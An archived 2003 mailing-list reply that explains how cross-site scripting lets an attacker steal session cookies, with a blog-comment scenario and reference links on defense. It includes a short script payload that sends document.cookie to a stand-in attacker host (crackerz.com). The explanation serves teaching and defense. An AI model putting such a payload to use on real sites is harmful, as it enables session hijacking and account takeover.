Re: [uug] cross site scripting

Wed, 18 Jun 2003 22:27:29 -0700 

On Wed, 2003-06-18 at 21:21, Michael Ryan Byrd wrote:
> Sometimes when a cross site scripting bug is found in a particular web
> application, the bug tracking sites will say, "Exploitation of this issue
> may enable an attacker to steal cookie-based authentication credentials from
> legitimate users of the software."
> 
> How is that possible?

Let's say you write a web authentication system using PHP. When somebody
logs in, you store the username and a token in their session. PHP keeps
track of that session via cookies, namely the PHPSESSID cookie. 

Now a cookie has a domain and path associated with it so that cookies
from site A aren't accessable from site B. But using cross site
scripting (XSS), you can trick the browser into sharing the cookies.

For this to work, a site has to accept user input and then display it
back to the user. A blog is a good example. Joe Cracker signs up for an
account and posts a message. His message contains HTML which isn't
properly sanitized before being saved in the database. Now when Larry
Admin comes along to read comments to his story, he sees Joe's message.
The HTML does something like this:

  <script language="javascript">
  window.open("http://crackerz.com/steal.cgi?sess="; + document.cookie);
  </script>

This works because the window is being opened within the cookie's domain
and path. The steal.cgi maybe shows some annoying ad so Larry doesn't
realize he's been had. All Joe has to do is change his cookie to match
Larry's and now to the system, he *is* Larry.

The solution to this is to check for HTML in all user input before doing
anything with it.

How about some references. A XSS overview[1]. How to exploit XSS
holes[2]. XSS defense in Perl[3]. An XSS filter for PHP[4]. Input
validation[5].

There's another really good one that I can't find right now. I'll post a
follow up if I stumble upon it.

Corey

1. http://www.cgisecurity.com/articles/xss-faq.shtml
2. http://www.idefense.com/XSS.html
3. http://www.perl.com/pub/a/2002/02/20/css.html
4. http://www.mricon.com/html/phpfilter.html
5. http://www.owasp.org/asac/input_validation/css.shtml

Attachment: signature.asc
Description: This is a digitally signed message part

____________________
BYU Unix Users Group 
http://uug.byu.edu/ 
___________________________________________________________________
List Info: http://uug.byu.edu/cgi-bin/mailman/listinfo/uug-list

Reply via email to